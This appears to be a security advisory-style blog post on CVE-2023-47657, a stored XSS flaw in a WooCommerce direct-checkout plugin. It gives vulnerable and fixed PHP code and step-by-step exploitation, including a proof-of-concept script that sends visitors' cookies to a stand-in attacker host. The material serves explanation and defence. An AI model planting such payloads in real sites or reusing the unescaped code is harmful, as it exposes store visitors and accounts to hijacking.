WordPress is one of the most widely used platforms for e-commerce sites. It owes much of its functionality to plugins, especially those that help store owners simplify the buying process. However, these plugins sometimes have security holes. One such vulnerability is CVE-2023-47657, a stored Cross-Site Scripting (XSS) bug in the popular “Direct Checkout – Quick View – Buy Now For WooCommerce” plugin by GrandPlugins, affecting all versions up to and including 1.5.8.

Let’s break down what this means, why it’s dangerous, and how attackers can exploit it.

What is CVE-2023-47657?

CVE-2023-47657 is an authenticated stored XSS vulnerability. A user with the Shop Manager role (or a higher-privileged role such as Administrator) can save JavaScript into plugin settings that the plugin renders on product pages. The script is then served to every admin or customer who views those pages.

- Affected versions: all up to and including 1.5.8
- Plugin page: WordPress.org Plugin Page

How the Vulnerability Works

The plugin does not sanitize or escape certain settings before displaying them on product pages. Specifically, a Shop Manager (or higher-level) user can enter arbitrary HTML/JavaScript in fields like the Quick View Button label or Buy Now Button label. The value is stored in the database and rendered verbatim on the frontend for customers and admins alike.

An attacker who holds the Shop Manager role, for example a vendor account in a multi-vendor marketplace or a compromised staff account, can therefore run JavaScript in the browser of every visitor to a product page. Because the script runs in the store's own origin, it can read cookies that are not HttpOnly, hijack sessions, or perform actions as the victim user.

Here’s a simplified overview:

// Vulnerable code inside plugin (example, simplified)

// Settings handler: the label is taken straight from the request
// and written to the options table without any sanitization.
$button_label = $_POST['quickview_btn_label'];
update_option('quickview_btn_label', $button_label);

// Later, on the product page: the stored value is echoed into the
// markup without any escaping.
echo get_option('quickview_btn_label');

There is no sanitization on input and no escaping on output, so whatever the Shop Manager types, including HTML and JavaScript, is stored and rendered as-is.

Exploit Example

Step 1: As a user with the Shop Manager role or higher, navigate to the plugin’s settings.

Step 2: Set the “Quick View Button Label” to a value containing JavaScript, for example:

Quick View <script>alert('XSS');</script>

Step 3: Save the settings.

Step 4: Visit any product page where the Quick View Button appears. The browser will execute the injected <script> code, showing an alert. In a real attack, the code could steal WordPress cookies or perform more damaging actions.

Proof-of-Concept (PoC)

<script>fetch('https://attacker-site.com/log?cookie=' + encodeURIComponent(document.cookie))</script>

*Once saved in the label field, every visitor's browser sends its document.cookie to the attacker's server. Note that WordPress sets its authentication cookies (wordpress_logged_in_* and wordpress_sec_*) with the HttpOnly flag, so they will not appear in document.cookie; a realistic payload would instead issue authenticated requests from inside the victim's browser, where those cookies are attached automatically, which is the "perform unwanted actions as users" case described above.*

How to Fix

- Update immediately: upgrade to a release later than 1.5.8 (check the plugin changelog for the version that addresses this CVE).
- Sanitize inputs and escape outputs: plugin authors need to sanitize values on save and escape them on output for every user-controlled value rendered on the frontend, including values entered by privileged roles.

Example of safe code:

// On save: strip tags and normalise whitespace before storing the label.
$button_label = sanitize_text_field($_POST['quickview_btn_label']);
update_option('quickview_btn_label', $button_label);

// On output: escape for an HTML text context so any remaining
// angle brackets or quotes are rendered literally, never parsed as markup.
echo esc_html(get_option('quickview_btn_label'));

References

- Wordfence Threat Intelligence: CVE-2023-47657 Advisory
- Plugin Homepage – GrandPlugins
- NVD: CVE-2023-47657

Conclusion

CVE-2023-47657 is a serious reminder that even functions reserved for trusted users need security checks. Stored XSS can haunt e-commerce stores long after attackers leave, so it’s critical for site owners, developers, and plugin authors to treat all input as untrusted, even from privileged users.

If you use the Direct Checkout – Quick View – Buy Now For WooCommerce plugin, update right away. Audit your team’s privileges, and monitor your site for suspicious behavior.

Timeline

Published on: 11/14/2023 00:15:07 UTC
Last modified on: 11/21/2023 01:31:09 UTC